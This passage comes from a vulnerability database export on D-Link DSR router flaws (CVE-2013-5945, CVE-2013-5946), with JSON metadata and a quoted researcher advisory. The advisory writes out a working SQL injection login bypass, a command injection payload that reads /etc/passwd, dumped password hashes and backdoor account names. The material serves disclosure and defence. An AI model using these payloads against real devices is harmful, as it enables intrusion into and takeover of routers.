      {
        "title": "DSR-500N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47084"
      },
      {
        "title": "DSR-500_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47083"
      },
      {
        "title": "DSR-1000N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47086"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7005"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7005"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/64461"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers/dsr-500n-wireless-n-unified-services-router"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "BID",
        "id": "64461"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "date": "2013-12-19T04:24:57.493000",
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "BID",
        "id": "64461"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "date": "2023-04-26T19:27:52.350000",
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  D-Link Vulnerability in obtaining important information in the firmware of router products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ],
    "trust": 0.6
  }
}

VAR-202002-0660

Vulnerability from variot - Updated: 2023-12-18 12:08

Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #

CVEs:

CVE-2013-5945 - Authentication Bypass by SQL-Injection

CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution

Vulnerable Routers:

D-Link DSR-150 (Firmware < v1.08B44)

D-Link DSR-150N (Firmware < v1.05B64)

D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)

D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)

D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)

Download URL:

http://tsd.dlink.com.tw

Arch:

mips and armv6l, Linux

Author:

0_o -- null_null

nu11.nu11 [at] yahoo.com

Date:

2013-08-18

Purpose:

Get a non-persistent root shell on your D-Link DSR.

Prerequisites:

Network access to the router ports 443 and 23.

!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!

A list of identified vulns follows. This list is not exhaustive as I assume

more vulns are present that just slipped my attention.

The fact that D-Link implemented a backdoor user (for what reason, please??)

and just renamed it instead of completely removing it after it was targetted

by my previous exploit, as well as the triviality of those vulns I found

makes me suggest that more vulns are present that are comparably easy to

exploit.

Since 2013-12-03, patches are available for:

DSR-150: Firmware v1.08B44

DSR-150N: Firmware v1.05B64

DSR-250 and DSR-250N: Firmware v1.08B44

DSR-500 and DSR-500N: Firmware v1.08B77

DSR-1000 and DSR-1000N: Firmware v1.08B77

via http://tsd.dlink.com.tw

And now, have a worthwhile read :-)

  1. Contents:

  2. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  3. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
  4. Exposure: D-Link backdoor user
  5. Vulnerability: Use of weak hash algorithms
  6. Exposure: Passwords are stored as plain text in config files
  7. Vulnerability: Bad permissions on /etc/shadow

  8. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  9. Possible via the global webUI login form.

  10. File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end

  • This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

  • Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin password = ' or 'a'='a

  • ...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

  • Old school SQL injection. Ohh, by the way...

  • The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --

  • Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)

  • Possible from the Tools --> System Check page.

  • File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. internetNameToNsLookup [...]

  • Command injection is possible in at least these form sections:

Ping or Trace an IP Address Perform a DNS Lookup

  • When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks.

  • All forms allow input like this:

localhost;

example:

localhost;cat /etc/passwd

  • This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.

  • Output from user provided commands gets displayed on the next page beneath the benign command output.

example:

[...]
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh </textarea> [...] 3. Exposure: D-Link backdoor user: * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW: root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one. * I verified this by showing the /etc/profile: # /etc/profile LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib PATH=.:/pfrm2.0/bin:$PATH CLISH_PATH=/etc/clish export PATH LD_LIBRARY_PATH CLISH_PATH # redirect all users except root to CLI if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then trap "/bin/login" SIGINT trap "" SIGTSTP /pfrm2.0/bin/cli exit fi PS1='DSR-250N> ' 4. Vulnerability: Use of weak hash algorithms: * In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet. * An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password. 5. Exposure: Passwords are stored as plain text in config files: * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example: [...] Users = {} Users[1] = {} Users[1]["Capabilities"] = "" Users[1]["DefaultUser"] = "1" Users[1]["UserId"] = "1" Users[1]["FirstName"] = "backdoor" Users[1]["OID"] = "0" Users[1]["GroupId"] = "1" Users[1]["UserName"] = "gkJ9232xXyruTRmY" Users[1]["Password"] = "thisobviouslyisafakepass" Users[1]["UserTimeOut"] = "10" Users[1]["_ROWID_"] = "1" Users[1]["LastName"] = "ssl" [...] 6. Vulnerability: Bad permissions on /etc/shadow * This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway. DSR-250N> ls -l -a /etc/shadow -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow DSR-250N> ps PID USER VSZ STAT COMMAND 1 root 2700 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 8 root 0 SW< [async/mgr] 111 root 0 SW< [kblockd/0] 120 root 0 SW< [khubd] 123 root 0 SW< [kseriod] 128 root 0 SW< [kslowd] 129 root 0 SW< [kslowd] 150 root 0 SW [pdflush] 151 root 0 SW [pdflush] 152 root 0 SW< [kswapd0] 200 root 0 SW< [aio/0] 210 root 0 SW< [nfsiod] 220 root 0 SW< [crypto/0] 230 root 0 SW< [cns3xxx_spi.0] 781 root 0 SW< [mtdblockd] 860 root 0 SW< [usbhid_resumer] 874 root 0 SW< [rpciod/0] 903 root 0 SWN [jffs2_gcd_mtd4] 909 root 0 SWN [jffs2_gcd_mtd5] 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db 1049 root 2704 S /usr/sbin/telnetd -l /bin/login 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd 1141 root 37000 S /pfrm2.0/bin/sshd 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db 1560 root 0 SW< [key_timehandler] 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf 1600 root 8036 S rvgd /tmp/system.db 1612 root 0 SW [cavium] 1621 root 8424 S vpnKAd /tmp/system.db 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh 1771 root 2680 S /pfrm2.0/bin/statusD 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db 2205 root 1904 S /pfrm2.0/bin/fReset 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va 3355 root 1768 S /pfrm2.0/bin/rt2860apd 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn- 5353 root 2704 S -sh 7877 root 2568 S sleep 60 7953 root 2568 S sleep 60 8008 root 2704 R ps 16749 root 2704 S -sh 25690 root 0 SW< [RtmpCmdQTask] 25692 root 0 SW< [RtmpWscTask] DSR-250N>

Show details on source website

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr router dsr-500",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-250n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-500n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b44",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.05b64",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b44",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b44",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.08b77",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2013-5945",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2013-007216",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
